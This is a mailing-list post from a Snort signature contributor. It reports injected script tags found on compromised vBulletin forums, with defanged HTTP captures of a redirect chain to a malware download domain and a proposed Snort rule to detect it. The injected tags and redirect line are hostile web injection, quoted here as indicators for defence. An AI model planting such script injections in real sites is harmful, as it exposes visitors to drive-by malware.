[Snort-sigs] Compromised vBulletin sig

James Lay jlay at ...3266...
Thu Apr 16 13:30:58 EDT 2015


Didn't see this in any current ruleset, so I thought I'd post it here.  
Yesterday I saw two of these.  Injected into the vBulletin initial page:

<script type="text/javascript" 
src="meow://meh[.]com/misc.php?v=364&js=js"></script>
<script type="text/javascript" 
src="meow://bleh[.]com/forums/misc.php?v=420&js=js"></script>


#######################################################################################
GET /misc.php?v=364&js=js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: 
meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; 
Trident/5.0)
Accept-Encoding: gzip, deflate
Host: meh.com
Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507; 
bblastactivity=0
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 15:58:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT; 
path=/
Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT
X-Powered-By: PleskLin
Server: cloudflare-nginx
CF-RAY: 1d78da121f59012e-SJC
Content-Encoding: gzip

document.location='meow://filestore72[.]info/download.php?id=f823cc00'
#######################################################################################

This in turn goes to:

#######################################################################################
GET /download.php?id=f823cc00 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: 
meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; 
Trident/5.0)
Accept-Encoding: gzip, deflate
Host: filestore72[.]info
Cache-Control: max-stale=0
Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 302 Moved Temporarily
Server: nginx/1.0.12
Date: Wed, 15 Apr 2015 15:53:40 GMT
Content-Type: text/html
Content-Length: 161
Connection: close
Location: 
meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA==

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.0.12</center>
</body>
</html>
#######################################################################################


Seems to be old-ish news, but the sig is below:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS 
(msg:"SERVER-WEBAPP Compromised vbulletin site"; 
flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v="; 
uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui"; 
reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info; 
classtype:bad-unknown; sid:10000156; rev:1;)

As usual, not sure if I have this perfect so anything to improve this 
sig would be excellent.  Thank you.

James




More information about the Snort-sigs mailing list